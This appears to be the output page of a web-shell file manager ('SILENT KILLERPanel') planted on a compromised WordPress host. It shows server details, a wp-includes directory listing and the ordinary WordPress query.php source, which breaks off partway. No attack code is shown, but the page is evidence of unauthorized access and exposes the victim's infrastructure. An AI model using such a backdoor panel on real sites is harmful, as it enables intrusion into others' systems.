SILENT KILLERPanel

Current Path: > home > transcarter > public_html > wp-includes


Operation   : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Software     : Apache
Server IP    : 198.54.126.42 | Your IP: 216.73.216.135
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/transcarter/public_html/wp-includes

NameTypeSizeLast ModifiedActions
ID3 Directory - -
IXR Directory - -
PHPMailer Directory - -
Requests Directory - -
SimplePie Directory - -
Text Directory - -
assets Directory - -
block-bindings Directory - -
block-patterns Directory - -
block-supports Directory - -
blocks Directory - -
certificates Directory - -
css Directory - -
customize Directory - -
fonts Directory - -
html-api Directory - -
images Directory - -
interactivity-api Directory - -
js Directory - -
l10n Directory - -
php-compat Directory - -
pomo Directory - -
rest-api Directory - -
sitemaps Directory - -
sodium_compat Directory - -
style-engine Directory - -
theme-compat Directory - -
widgets Directory - -
admin-bar.php File 37100 bytes September 03 2024 19:45:16.
atomlib.php File 11950 bytes April 21 2022 10:24:18.
author-template.php File 18951 bytes May 14 2023 16:58:24.
block-bindings.php File 5594 bytes June 12 2024 11:44:14.
block-editor.php File 28166 bytes June 04 2024 10:55:14.
block-i18n.json File 316 bytes August 11 2021 08:08:02.
block-patterns.php File 13162 bytes February 27 2024 21:05:12.
block-template-utils.php File 56559 bytes July 24 2024 13:40:16.
block-template.php File 12376 bytes March 06 2024 05:05:12.
blocks.php File 97472 bytes June 25 2024 11:45:18.
bookmark-template.php File 12934 bytes March 20 2024 11:49:10.
bookmark.php File 15427 bytes March 23 2024 13:20:12.
cache-compat.php File 5969 bytes October 10 2022 17:22:12.
cache.php File 13474 bytes October 10 2022 17:22:12.
canonical.php File 34513 bytes February 16 2024 23:34:12.
capabilities.php File 40016 bytes May 05 2024 13:35:20.
category-template.php File 57003 bytes September 25 2023 23:27:12.
category.php File 12709 bytes August 24 2023 08:01:16.
class-IXR.php File 2543 bytes February 06 2020 06:33:12.
class-avif-info.php File 29615 bytes April 26 2024 14:02:14.
class-feed.php File 529 bytes February 06 2020 06:33:12.
class-http.php File 367 bytes June 17 2022 10:20:14.
class-json.php File 43684 bytes February 03 2023 13:35:20.
class-oembed.php File 401 bytes June 17 2022 10:20:14.
class-phpass.php File 6708 bytes February 13 2023 09:08:24.
class-phpmailer.php File 664 bytes July 21 2020 11:58:02.
class-pop3.php File 20969 bytes February 11 2023 12:43:22.
class-requests.php File 2237 bytes April 05 2023 12:12:26.
class-simplepie-interface.php File 1079 bytes September 12 2022 14:47:14.
class-simplepie.php File 98061 bytes February 17 2024 13:25:10.
class-smtp.php File 457 bytes January 26 2021 13:45:58.
class-snoopy.php File 37715 bytes February 03 2023 13:35:20.
class-walker-category-dropdown.php File 2469 bytes September 14 2023 11:46:20.
class-walker-category.php File 8477 bytes September 08 2023 08:32:24.
class-walker-comment.php File 14221 bytes March 18 2024 14:46:14.
class-walker-nav-menu.php File 11313 bytes June 27 2023 14:26:28.
class-walker-page-dropdown.php File 2710 bytes September 14 2023 11:46:20.
class-walker-page.php File 7612 bytes September 14 2023 11:46:20.
class-wp-admin-bar.php File 17874 bytes July 18 2024 15:45:14.
class-wp-ajax-response.php File 5266 bytes September 12 2022 14:47:14.
class-wp-application-passwords.php File 12854 bytes May 08 2023 21:37:24.
class-wp-block-bindings-registry.php File 8944 bytes June 12 2024 11:44:14.
class-wp-block-bindings-source.php File 2178 bytes May 02 2024 12:19:14.
class-wp-block-editor-context.php File 1350 bytes September 12 2022 14:47:14.
class-wp-block-list.php File 4757 bytes November 01 2023 23:04:24.
class-wp-block-parser-block.php File 2555 bytes June 26 2023 23:45:38.
class-wp-block-parser-frame.php File 1916 bytes June 26 2023 23:45:38.
class-wp-block-parser.php File 11532 bytes May 02 2024 19:09:16.
class-wp-block-pattern-categories-registry.php File 5371 bytes September 12 2022 14:47:14.
class-wp-block-patterns-registry.php File 11738 bytes May 23 2024 17:35:14.
class-wp-block-styles-registry.php File 6262 bytes May 30 2024 07:54:08.
class-wp-block-supports.php File 5566 bytes May 06 2024 20:25:16.
class-wp-block-template.php File 1951 bytes June 23 2023 05:29:24.
class-wp-block-type-registry.php File 5013 bytes October 12 2023 11:34:34.
class-wp-block-type.php File 17265 bytes May 01 2024 23:01:10.
class-wp-block.php File 19691 bytes June 13 2024 07:57:16.
class-wp-classic-to-block-menu-converter.php File 4088 bytes August 21 2023 16:51:20.
class-wp-comment-query.php File 48395 bytes June 21 2024 16:26:14.
class-wp-comment.php File 9372 bytes August 24 2023 07:44:24.
class-wp-customize-control.php File 25730 bytes May 14 2024 15:49:10.
class-wp-customize-manager.php File 202413 bytes June 10 2024 21:12:18.
class-wp-customize-nav-menus.php File 57384 bytes June 03 2024 19:35:14.
class-wp-customize-panel.php File 10670 bytes September 10 2023 08:04:18.
class-wp-customize-section.php File 11244 bytes September 10 2023 08:04:18.
class-wp-customize-setting.php File 29889 bytes September 10 2023 08:04:18.
class-wp-customize-widgets.php File 71520 bytes May 14 2024 15:49:10.
class-wp-date-query.php File 35726 bytes February 16 2024 21:47:12.
class-wp-dependencies.php File 14062 bytes September 08 2023 08:32:24.
class-wp-dependency.php File 2627 bytes November 25 2022 15:12:16.
class-wp-duotone.php File 40783 bytes June 14 2024 11:18:12.
class-wp-editor.php File 72177 bytes June 20 2024 19:27:12.
class-wp-embed.php File 15994 bytes July 09 2023 19:17:30.
class-wp-error.php File 7502 bytes February 21 2023 16:39:20.
class-wp-fatal-error-handler.php File 7948 bytes December 16 2023 09:38:26.
class-wp-feed-cache-transient.php File 2586 bytes September 12 2022 14:47:14.
class-wp-feed-cache.php File 969 bytes August 10 2023 00:06:22.
class-wp-hook.php File 16000 bytes September 18 2023 11:41:18.
class-wp-http-cookie.php File 7389 bytes June 24 2023 16:17:24.
class-wp-http-curl.php File 12541 bytes September 21 2023 17:29:12.
class-wp-http-encoding.php File 6689 bytes June 22 2023 13:57:24.
class-wp-http-ixr-client.php File 3501 bytes September 12 2022 14:47:14.
class-wp-http-proxy.php File 5980 bytes June 22 2023 13:36:26.
class-wp-http-requests-hooks.php File 2022 bytes December 15 2022 21:32:18.
class-wp-http-requests-response.php File 4400 bytes October 11 2023 06:05:26.
class-wp-http-response.php File 2977 bytes September 12 2022 14:47:14.
class-wp-http-streams.php File 16859 bytes September 21 2023 17:29:12.
class-wp-http.php File 40760 bytes April 07 2024 10:18:18.
class-wp-image-editor-gd.php File 18943 bytes June 03 2024 19:27:12.
class-wp-image-editor-imagick.php File 32104 bytes June 14 2024 14:26:10.
class-wp-image-editor.php File 17606 bytes February 02 2024 17:48:16.
class-wp-list-util.php File 7443 bytes February 27 2024 22:38:16.
class-wp-locale-switcher.php File 6630 bytes January 25 2024 07:53:18.
class-wp-locale.php File 16111 bytes May 26 2024 19:51:14.
class-wp-matchesmapregex.php File 1828 bytes February 06 2024 01:25:14.
class-wp-meta-query.php File 30531 bytes April 22 2024 19:25:08.
class-wp-metadata-lazyloader.php File 6833 bytes May 11 2023 10:15:24.
class-wp-navigation-fallback.php File 9211 bytes October 06 2023 13:06:22.
class-wp-network-query.php File 19857 bytes June 21 2024 16:26:14.
class-wp-network.php File 12288 bytes May 13 2024 12:34:12.
class-wp-object-cache.php File 17594 bytes March 14 2023 15:55:20.
class-wp-oembed-controller.php File 6905 bytes March 06 2024 05:05:12.
class-wp-oembed.php File 31475 bytes June 07 2024 22:15:16.
class-wp-paused-extensions-storage.php File 5090 bytes February 16 2024 21:47:12.
class-wp-plugin-dependencies.php File 25319 bytes May 30 2024 14:15:10.
class-wp-post-type.php File 30350 bytes May 27 2024 14:24:14.
class-wp-post.php File 6484 bytes September 12 2022 14:47:14.
class-wp-query.php File 154081 bytes May 20 2024 20:21:16.
class-wp-recovery-mode-cookie-service.php File 6877 bytes October 04 2022 02:59:14.
class-wp-recovery-mode-email-service.php File 11183 bytes May 02 2023 14:45:22.
class-wp-recovery-mode-key-service.php File 4601 bytes December 24 2023 13:05:22.
class-wp-recovery-mode-link-service.php File 3463 bytes September 12 2022 14:47:14.
class-wp-recovery-mode.php File 11435 bytes May 02 2023 14:45:22.
class-wp-rewrite.php File 63430 bytes September 09 2023 08:28:26.
class-wp-role.php File 2523 bytes September 08 2023 08:32:24.
class-wp-roles.php File 8580 bytes July 28 2023 10:37:26.
class-wp-script-modules.php File 13755 bytes May 10 2024 08:09:18.
class-wp-scripts.php File 27906 bytes February 05 2024 09:43:12.
class-wp-session-tokens.php File 7451 bytes September 12 2022 14:47:14.
class-wp-simplepie-file.php File 3377 bytes August 10 2023 00:06:22.
class-wp-simplepie-sanitize-kses.php File 1770 bytes August 10 2023 00:06:22.
class-wp-site-query.php File 31545 bytes June 21 2024 16:26:14.
class-wp-site.php File 7454 bytes September 12 2022 14:47:14.
class-wp-styles.php File 10898 bytes May 02 2023 14:45:22.
class-wp-tax-query.php File 19555 bytes February 16 2024 21:47:12.
class-wp-taxonomy.php File 18567 bytes April 27 2023 22:15:18.
class-wp-term-query.php File 41166 bytes March 02 2024 13:38:08.
class-wp-term.php File 5298 bytes September 12 2022 14:47:14.
class-wp-text-diff-renderer-inline.php File 979 bytes February 14 2024 19:27:10.
class-wp-text-diff-renderer-table.php File 18807 bytes October 15 2023 13:55:24.
class-wp-textdomain-registry.php File 10203 bytes June 11 2024 13:27:18.
class-wp-theme-json-data.php File 1809 bytes June 04 2024 10:55:14.
class-wp-theme-json-resolver.php File 34714 bytes June 24 2024 09:33:16.
class-wp-theme-json-schema.php File 7367 bytes June 06 2024 07:02:16.
class-wp-theme-json.php File 157322 bytes September 04 2024 13:24:14.
class-wp-theme.php File 65299 bytes April 19 2024 16:59:16.
class-wp-token-map.php File 28430 bytes June 02 2024 14:16:14.
class-wp-user-meta-session-tokens.php File 2990 bytes January 09 2019 05:04:50.
class-wp-user-query.php File 43654 bytes May 19 2024 18:53:20.
class-wp-user-request.php File 2222 bytes September 12 2022 14:47:14.
class-wp-user.php File 22827 bytes February 16 2024 21:47:12.
class-wp-walker.php File 13322 bytes August 07 2024 18:47:10.
class-wp-widget-factory.php File 3347 bytes September 12 2022 14:47:14.
class-wp-widget.php File 18386 bytes August 25 2023 00:28:16.
class-wp-xmlrpc-server.php File 214948 bytes February 11 2024 19:14:20.
class-wp.php File 26119 bytes August 13 2023 09:31:24.
class-wpdb.php File 118379 bytes April 04 2024 14:13:14.
class.wp-dependencies.php File 373 bytes September 20 2022 13:17:12.
class.wp-scripts.php File 343 bytes September 20 2022 13:17:12.
class.wp-styles.php File 338 bytes September 20 2022 13:17:12.
comment-template.php File 101738 bytes July 18 2024 16:58:16.
comment.php File 129226 bytes June 13 2024 12:05:14.
compat.php File 16467 bytes July 18 2024 17:22:16.
cron.php File 41582 bytes May 02 2024 12:19:14.
date.php File 400 bytes June 17 2022 10:20:14.
default-constants.php File 11238 bytes April 17 2024 08:46:20.
default-filters.php File 35490 bytes June 11 2024 01:40:14.
default-widgets.php File 2222 bytes May 25 2021 07:27:58.
deprecated.php File 186291 bytes June 04 2024 06:39:10.
embed-template-trigger.php File 373 bytes September 12 2022 14:47:14.
embed-template.php File 338 bytes June 17 2022 10:20:14.
embed.php File 37908 bytes June 02 2024 21:02:16.
error-protection.php File 4121 bytes May 02 2023 14:45:22.
error_log File 789181 bytes August 06 2025 18:49:40.
feed-atom-comments.php File 5504 bytes March 04 2024 12:41:10.
feed-atom.php File 3048 bytes November 29 2021 09:52:00.
feed-rdf.php File 2668 bytes January 29 2020 00:45:18.
feed-rss.php File 1189 bytes January 29 2020 00:45:18.
feed-rss2-comments.php File 4136 bytes March 04 2024 12:41:10.
feed-rss2.php File 3799 bytes January 29 2020 00:45:18.
feed.php File 23317 bytes June 13 2024 19:50:14.
fonts.php File 9441 bytes June 05 2024 22:19:18.
formatting.php File 335374 bytes June 24 2024 13:42:10.
functions.php File 280644 bytes July 18 2024 17:22:16.
functions.wp-scripts.php File 14558 bytes May 26 2024 19:51:14.
functions.wp-styles.php File 8583 bytes May 26 2024 19:51:14.
general-template.php File 169119 bytes June 13 2024 13:48:06.
global-styles-and-settings.php File 21424 bytes July 12 2024 19:01:16.
http.php File 25548 bytes August 06 2025 04:48:37.
https-detection.php File 5661 bytes September 22 2023 18:08:20.
https-migration.php File 4741 bytes July 10 2023 21:38:26.
kses.php File 74389 bytes June 17 2024 11:04:12.
l10n-object.php File 38 bytes June 26 2025 11:42:43.
l10n.php File 66655 bytes August 06 2025 04:48:37.
link-template.php File 156140 bytes May 27 2024 15:29:16.
load.php File 55353 bytes May 10 2024 10:48:16.
locale.php File 162 bytes October 08 2019 16:19:04.
media-template.php File 62218 bytes July 24 2024 16:32:16.
media.php File 210542 bytes August 07 2024 18:43:12.
meta.php File 64078 bytes September 26 2023 14:32:20.
ms-blogs.php File 25728 bytes March 29 2024 10:42:14.
ms-default-constants.php File 4921 bytes June 13 2024 19:50:14.
ms-default-filters.php File 6636 bytes February 24 2023 01:23:20.
ms-deprecated.php File 21759 bytes April 12 2024 16:47:14.
ms-files.php File 2711 bytes August 23 2023 14:53:24.
ms-functions.php File 91243 bytes November 13 2023 11:13:28.
ms-load.php File 19883 bytes March 25 2024 16:19:18.
ms-network.php File 3782 bytes May 02 2023 10:26:24.
ms-settings.php File 4124 bytes June 22 2023 13:57:24.
ms-site.php File 40346 bytes May 04 2024 18:25:10.
nav-menu-template.php File 25917 bytes May 09 2024 14:16:14.
nav-menu.php File 44145 bytes May 08 2024 17:37:14.
option.php File 100442 bytes June 14 2024 14:21:10.
pluggable-deprecated.php File 6263 bytes January 11 2020 18:32:06.
pluggable.php File 113181 bytes April 13 2024 15:33:14.
plugin.php File 35465 bytes June 08 2023 06:54:22.
post-formats.php File 7102 bytes May 27 2024 15:29:16.
post-template.php File 66814 bytes June 01 2024 16:37:18.
post-thumbnail-template.php File 10308 bytes May 17 2023 17:31:24.
post.php File 284273 bytes June 18 2024 13:46:10.
query.php File 37035 bytes August 24 2023 08:01:16.
registration-functions.php File 200 bytes November 12 2020 11:17:08.
registration.php File 200 bytes November 12 2020 11:17:08.
rest-api.php File 98466 bytes June 02 2024 21:02:16.
revision.php File 30906 bytes May 06 2024 15:35:20.
rewrite.php File 19514 bytes July 11 2023 10:15:28.
robots-template.php File 5185 bytes April 06 2022 14:33:04.
rss-functions.php File 255 bytes November 16 2020 22:52:06.
rss.php File 23107 bytes June 13 2024 19:50:14.
script-loader.php File 130296 bytes June 13 2024 14:06:08.
script-modules.php File 5978 bytes May 26 2024 19:51:14.
session.php File 258 bytes February 06 2020 06:33:12.
shortcodes.php File 24051 bytes May 25 2024 02:04:12.
sitemaps.php File 3238 bytes May 15 2021 16:38:06.
spl-autoload-compat.php File 441 bytes November 12 2020 11:17:08.
style-engine.php File 7563 bytes May 03 2024 03:47:12.
taxonomy.php File 175314 bytes June 18 2024 03:12:12.
template-canvas.php File 544 bytes September 30 2023 23:22:28.
template-loader.php File 3012 bytes May 26 2020 08:37:10.
template.php File 24154 bytes February 21 2024 19:26:08.
theme-i18n.json File 1245 bytes June 24 2024 07:51:16.
theme-previews.php File 2832 bytes December 08 2023 06:32:24.
theme-templates.php File 6223 bytes October 13 2023 16:21:22.
theme.json File 8704 bytes June 12 2024 05:11:14.
theme.php File 133979 bytes June 13 2024 19:50:14.
update.php File 36884 bytes June 13 2024 19:50:14.
user.php File 173735 bytes June 05 2024 11:23:10.
vars.php File 6489 bytes April 04 2024 12:40:06.
version.php File 961 bytes August 06 2025 04:48:37.
widgets.php File 70682 bytes May 26 2024 19:51:14.
wp-db.php File 445 bytes July 21 2022 21:45:12.
wp-diff.php File 647 bytes February 06 2020 06:33:12.

Reading File: /home/transcarter/public_html/wp-includes/query.php

<?php
/**
 * WordPress Query API
 *
 * The query API attempts to get which part of WordPress the user is on. It
 * also provides functionality for getting URL query information.
 *
 * @link https://developer.wordpress.org/themes/basics/the-loop/ More information on The Loop.
 *
 * @package WordPress
 * @subpackage Query
 */

/**
 * Retrieves the value of a query variable in the WP_Query class.
 *
 * @since 1.5.0
 * @since 3.9.0 The `$default_value` argument was introduced.
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param string $query_var     The variable key to retrieve.
 * @param mixed  $default_value Optional. Value to return if the query variable is not set.
 *                              Default empty string.
 * @return mixed Contents of the query variable.
 */
function get_query_var( $query_var, $default_value = '' ) {
	global $wp_query;
	return $wp_query->get( $query_var, $default_value );
}

/**
 * Retrieves the currently queried object.
 *
 * Wrapper for WP_Query::get_queried_object().
 *
 * @since 3.1.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return WP_Term|WP_Post_Type|WP_Post|WP_User|null The queried object.
 */
function get_queried_object() {
	global $wp_query;
	return $wp_query->get_queried_object();
}

/**
 * Retrieves the ID of the currently queried object.
 *
 * Wrapper for WP_Query::get_queried_object_id().
 *
 * @since 3.1.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return int ID of the queried object.
 */
function get_queried_object_id() {
	global $wp_query;
	return $wp_query->get_queried_object_id();
}

/**
 * Sets the value of a query variable in the WP_Query class.
 *
 * @since 2.2.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param string $query_var Query variable key.
 * @param mixed  $value     Query variable value.
 */
function set_query_var( $query_var, $value ) {
	global $wp_query;
	$wp_query->set( $query_var, $value );
}

/**
 * Sets up The Loop with query parameters.
 *
 * Note: This function will completely override the main query and isn't intended for use
 * by plugins or themes. Its overly-simplistic approach to modifying the main query can be
 * problematic and should be avoided wherever possible. In most cases, there are better,
 * more performant options for modifying the main query such as via the {@see 'pre_get_posts'}
 * action within WP_Query.
 *
 * This must not be used within the WordPress Loop.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param array|string $query Array or string of WP_Query arguments.
 * @return WP_Post[]|int[] Array of post objects or post IDs.
 */
function query_posts( $query ) {
	$GLOBALS['wp_query'] = new WP_Query();
	return $GLOBALS['wp_query']->query( $query );
}

/**
 * Destroys the previous query and sets up a new query.
 *
 * This should be used after query_posts() and before another query_posts().
 * This will remove obscure bugs that occur when the previous WP_Query object
 * is not destroyed properly before another is set up.
 *
 * @since 2.3.0
 *
 * @global WP_Query $wp_query     WordPress Query object.
 * @global WP_Query $wp_the_query Copy of the global WP_Query instance created during wp_reset_query().
 */
function wp_reset_query() {
	$GLOBALS['wp_query'] = $GLOBALS['wp_the_query'];
	wp_reset_postdata();
}

/**
 * After looping through a separate query, this function restores
 * the $post global to the current post in the main query.
 *
 * @since 3.0.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 */
function wp_reset_postdata() {
	global $wp_query;

	if ( isset( $wp_query ) ) {
		$wp_query->reset_postdata();
	}
}

/*
 * Query type checks.
 */

/**
 * Determines whether the query is for an existing archive page.
 *
 * Archive pages include category, tag, author, date, custom post type,
 * and custom taxonomy based archives.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @see is_category()
 * @see is_tag()
 * @see is_author()
 * @see is_date()
 * @see is_post_type_archive()
 * @see is_tax()
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for an existing archive page.
 */
function is_archive() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_archive();
}

/**
 * Determines whether the query is for an existing post type archive page.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 3.1.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param string|string[] $post_types Optional. Post type or array of posts types
 *                                    to check against. Default empty.
 * @return bool Whether the query is for an existing post type archive page.
 */
function is_post_type_archive( $post_types = '' ) {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_post_type_archive( $post_types );
}

/**
 * Determines whether the query is for an existing attachment page.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 2.0.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param int|string|int[]|string[] $attachment Optional. Attachment ID, title, slug, or array of such
 *                                              to check against. Default empty.
 * @return bool Whether the query is for an existing attachment page.
 */
function is_attachment( $attachment = '' ) {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_attachment( $attachment );
}

/**
 * Determines whether the query is for an existing author archive page.
 *
 * If the $author parameter is specified, this function will additionally
 * check if the query is for one of the authors specified.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param int|string|int[]|string[] $author Optional. User ID, nickname, nicename, or array of such
 *                                          to check against. Default empty.
 * @return bool Whether the query is for an existing author archive page.
 */
function is_author( $author = '' ) {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_author( $author );
}

/**
 * Determines whether the query is for an existing category archive page.
 *
 * If the $category parameter is specified, this function will additionally
 * check if the query is for one of the categories specified.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param int|string|int[]|string[] $category Optional. Category ID, name, slug, or array of such
 *                                            to check against. Default empty.
 * @return bool Whether the query is for an existing category archive page.
 */
function is_category( $category = '' ) {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_category( $category );
}

/**
 * Determines whether the query is for an existing tag archive page.
 *
 * If the $tag parameter is specified, this function will additionally
 * check if the query is for one of the tags specified.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 2.3.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param int|string|int[]|string[] $tag Optional. Tag ID, name, slug, or array of such
 *                                       to check against. Default empty.
 * @return bool Whether the query is for an existing tag archive page.
 */
function is_tag( $tag = '' ) {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_tag( $tag );
}

/**
 * Determines whether the query is for an existing custom taxonomy archive page.
 *
 * If the $taxonomy parameter is specified, this function will additionally
 * check if the query is for that specific $taxonomy.
 *
 * If the $term parameter is specified in addition to the $taxonomy parameter,
 * this function will additionally check if the query is for one of the terms
 * specified.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 2.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param string|string[]           $taxonomy Optional. Taxonomy slug or slugs to check against.
 *                                            Default empty.
 * @param int|string|int[]|string[] $term     Optional. Term ID, name, slug, or array of such
 *                                            to check against. Default empty.
 * @return bool Whether the query is for an existing custom taxonomy archive page.
 *              True for custom taxonomy archive pages, false for built-in taxonomies
 *              (category and tag archives).
 */
function is_tax( $taxonomy = '', $term = '' ) {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_tax( $taxonomy, $term );
}

/**
 * Determines whether the query is for an existing date archive.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for an existing date archive.
 */
function is_date() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_date();
}

/**
 * Determines whether the query is for an existing day archive.
 *
 * A conditional check to test whether the page is a date-based archive page displaying posts for the current day.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for an existing day archive.
 */
function is_day() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_day();
}

/**
 * Determines whether the query is for a feed.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param string|string[] $feeds Optional. Feed type or array of feed types
 *                                         to check against. Default empty.
 * @return bool Whether the query is for a feed.
 */
function is_feed( $feeds = '' ) {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_feed( $feeds );
}

/**
 * Is the query for a comments feed?
 *
 * @since 3.0.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for a comments feed.
 */
function is_comment_feed() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_comment_feed();
}

/**
 * Determines whether the query is for the front page of the site.
 *
 * This is for what is displayed at your site's main URL.
 *
 * Depends on the site's "Front page displays" Reading Settings 'show_on_front' and 'page_on_front'.
 *
 * If you set a static page for the front page of your site, this function will return
 * true when viewing that page.
 *
 * Otherwise the same as {@see is_home()}.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 2.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for the front page of the site.
 */
function is_front_page() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_front_page();
}

/**
 * Determines whether the query is for the blog homepage.
 *
 * The blog homepage is the page that shows the time-based blog content of the site.
 *
 * is_home() is dependent on the site's "Front page displays" Reading Settings 'show_on_front'
 * and 'page_for_posts'.
 *
 * If a static page is set for the front page of the site, this function will return true only
 * on the page you set as the "Posts page".
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @see is_front_page()
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for the blog homepage.
 */
function is_home() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_home();
}

/**
 * Determines whether the query is for the Privacy Policy page.
 *
 * The Privacy Policy page is the page that shows the Privacy Policy content of the site.
 *
 * is_privacy_policy() is dependent on the site's "Change your Privacy Policy page" Privacy Settings 'wp_page_for_privacy_policy'.
 *
 * This function will return true only on the page you set as the "Privacy Policy page".
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 5.2.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for the Privacy Policy page.
 */
function is_privacy_policy() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_privacy_policy();
}

/**
 * Determines whether the query is for an existing month archive.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for an existing month archive.
 */
function is_month() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
